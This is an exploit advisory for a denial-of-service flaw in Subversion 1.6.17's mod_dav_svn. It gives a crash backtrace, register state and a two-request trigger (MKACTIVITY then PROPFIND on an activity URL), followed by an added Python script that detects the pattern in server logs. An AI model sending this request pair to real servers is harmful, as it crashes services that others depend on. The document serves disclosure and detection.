Subversion 1.6.17 Denial Of Service

Posted Mar 6, 2013
Authored by AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, c8e74ebd8392fda4788179f9a02bb49337638e7b

Apache Subversion version 1.6.17 suffers from a denial of service vulnerability.

tags | exploit, denial of service
SHA-256 | e9b34e60031efbc5447532dbe3d1f98c7abe97c43a721a45f4c089ca2632b2e5

#########################
# Subversion MKACTIVITY #
#########################
#
# Authors:
#
# 22733db72ab3ed94b5f8a1ffcde850251fe6f466
# c8e74ebd8392fda4788179f9a02bb49337638e7b
# AKAT-1
#
#######################################

# libsvn_fs's svn_fs_file_length() fun
# tested on 1.6.17 and a few others

(gdb) where
#0 0x00007f2595db9d60 in svn_fs_file_length () from /usr/lib/x86_64-linux-gnu/libsvn_fs-1.so.1
#1 0x00007f25961f2d8b in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so
#2 0x00007f25961f37c5 in dav_svn__insert_all_liveprops () from /usr/lib/apache2/modules/mod_dav_svn.so
#3 0x00007f259682b37a in dav_run_insert_all_liveprops (r=0x7f2590df10a0, resource=0x7fff6e97e1a8, what=DAV_PROP_INSERT_VALUE, phdr=0x7fff6e97dff0) at mod_dav.c:4889
#4 0x00007f259682bc55 in dav_get_allprops (propdb=0x7f258d0db3d0, what=DAV_PROP_INSERT_VALUE) at props.c:655
#5 0x00007f2596824f5e in dav_propfind_walker (wres=0x7fff6e97e188, calltype=<optimized out>) at mod_dav.c:1949
#6 0x00007f25961fc6d1 in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so
#7 0x00007f25961fcb6d in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so
#8 0x00007f2596829bda in dav_method_propfind (r=0x7f2590df10a0) at mod_dav.c:2081
#9 dav_handler (r=0x7f2590df10a0) at mod_dav.c:4681
#10 dav_handler (r=0x7f2590df10a0) at mod_dav.c:4587
#11 0x00007f259e568b50 in ap_run_handler (r=0x7f2590df10a0) at config.c:159
#12 0x00007f259e568f9b in ap_invoke_handler (r=r@entry=0x7f2590df10a0) at config.c:377
#13 0x00007f259e579078 in ap_process_request (r=r@entry=0x7f2590df10a0) at http_request.c:282
#14 0x00007f259e575f38 in ap_process_http_connection (c=0x7f25917c0290) at http_core.c:190
#15 0x00007f259e56f510 in ap_run_process_connection (c=0x7f25917c0290) at connection.c:43
#16 0x00007f259e56f8f8 in ap_process_connection (c=c@entry=0x7f25917c0290, csd=<optimized out>) at connection.c:190
#17 0x00007f259e57dc2e in child_main (child_num_arg=child_num_arg@entry=6) at prefork.c:667
#18 0x00007f259e57e382 in make_child (slot=6, s=0x7f259e4d6818) at prefork.c:768
#19 make_child (s=0x7f259e4d6818, slot=6) at prefork.c:696
#20 0x00007f259e57eee6 in perform_idle_server_maintenance (p=<optimized out>) at prefork.c:903
#21 ap_mpm_run (_pconf=_pconf@entry=0x7f259e515028, plog=<optimized out>, s=s@entry=0x7f259e4d6818) at prefork.c:1107
#22 0x00007f259e553826 in main (argc=3, argv=0x7fff6e97e9b8) at main.c:755
(gdb)
(gdb) i r
rax 0x7fff6e97e1e0 140735048835552
rbx 0x7fff6e97e1a8 140735048835496
rcx 0x7f2590df7028 139799321079848
rdx 0x0 0
rsi 0x0 0
rdi 0x7fff6e97dec8 140735048834760
rbp 0x3 0x3
rsp 0x7fff6e97de78 0x7fff6e97de78
r8 0x7f2596833ee0 139799415701216
r9 0x1 1
r10 0x1 1
r11 0x1 1
r12 0x4e24 20004
r13 0x7f2590e08028 139799321149480
r14 0x7fff6e97dff0 140735048835056
r15 0x7f2590df7028 139799321079848
rip 0x7f2595db9d60 0x7f2595db9d60 <svn_fs_file_length>
eflags 0x246 [ PF ZF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) x/i $rip
=> 0x7f2595db9d60 <svn_fs_file_length>: mov 0x30(%rsi),%rax
(gdb) x/x $rsi
0x0: Cannot access memory at address 0x0


Basically, it requires >= 2 requests to crash an Apache child process (in mod_dav_svn / libsvn_fs).
-- cut --
1. MKACTIVITY /egg/!svn/act/foo HTTP/1.1
2. PROPFIND /egg/!svn/act/foo HTTP/1.1 (sigsegv)
-- cut --
EOF
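
Detection sketch for the two-request pattern above, added here as an example and not part of the original advisory. MKACTIVITY on its own is normal commit traffic, and a child that segfaults in the handler typically dies before its PROPFIND reaches the access log, so the example pairs MKACTIVITY entries on `!svn/act/` URLs with segfault notices in the error log. Assumptions: Apache 2.2-style common/combined access log and error log formats, both written in the same timezone; the sample log lines, client addresses and PID are constructed.

```python
import re
from datetime import datetime, timedelta

# Constructed sample logs (not from the advisory); clients are RFC 5737 documentation addresses.
ACCESS_LOG = """\
192.0.2.10 - - [06/Mar/2013:10:15:01 +0000] "MKACTIVITY /egg/!svn/act/foo HTTP/1.1" 201 312
198.51.100.7 - - [06/Mar/2013:10:15:01 +0000] "PROPFIND /egg/trunk HTTP/1.1" 207 690
198.51.100.7 - - [06/Mar/2013:10:40:00 +0000] "MKACTIVITY /egg/!svn/act/6f2c HTTP/1.1" 201 312
""".splitlines()
ERROR_LOG = """\
[Wed Mar 06 10:15:02 2013] [notice] child pid 4242 exit signal Segmentation fault (11)
[Wed Mar 06 10:20:00 2013] [error] [client 198.51.100.7] File does not exist: /var/www/x
""".splitlines()

ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
CRASH_RE = re.compile(r'^\[([^\]]+)\] \[notice\] child pid (\d+) exit signal Segmentation fault')
ACTIVITY_RE = re.compile(r'/!svn/act/[^/]+/?$')  # activity URL under any repository root

def activity_requests(lines):
    """Yield (time, client, method, uri) for access-log entries on activity URLs."""
    for line in lines:
        m = ACCESS_RE.match(line)
        if m and ACTIVITY_RE.search(m.group(4)):
            # Assumption: error log uses the same zone, so the offset is dropped.
            ts = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z").replace(tzinfo=None)
            yield ts, m.group(1), m.group(3), m.group(4)

def crashes(lines):
    """Yield (time, pid) for child-process segfault notices in the error log."""
    for line in lines:
        m = CRASH_RE.match(line)
        if m:
            yield datetime.strptime(m.group(1), "%a %b %d %H:%M:%S %Y"), int(m.group(2))

def correlate(access_lines, error_lines, window_s=30):
    """Return MKACTIVITY requests followed by a child segfault within window_s seconds."""
    crash_list = list(crashes(error_lines))
    window = timedelta(seconds=window_s)
    findings = []
    for ts, client, method, uri in activity_requests(access_lines):
        if method != "MKACTIVITY":
            continue
        pids = [pid for cts, pid in crash_list if timedelta(0) <= cts - ts <= window]
        if pids:
            findings.append({"client": client, "uri": uri, "time": ts, "crashed_pids": pids})
    return findings

if __name__ == "__main__":
    for f in correlate(ACCESS_LOG, ERROR_LOG):
        print(f)
```

On a busy server a short window keeps unrelated crashes from being attributed to ordinary commits; a hit is a lead to check against the core dump backtrace, not proof by itself.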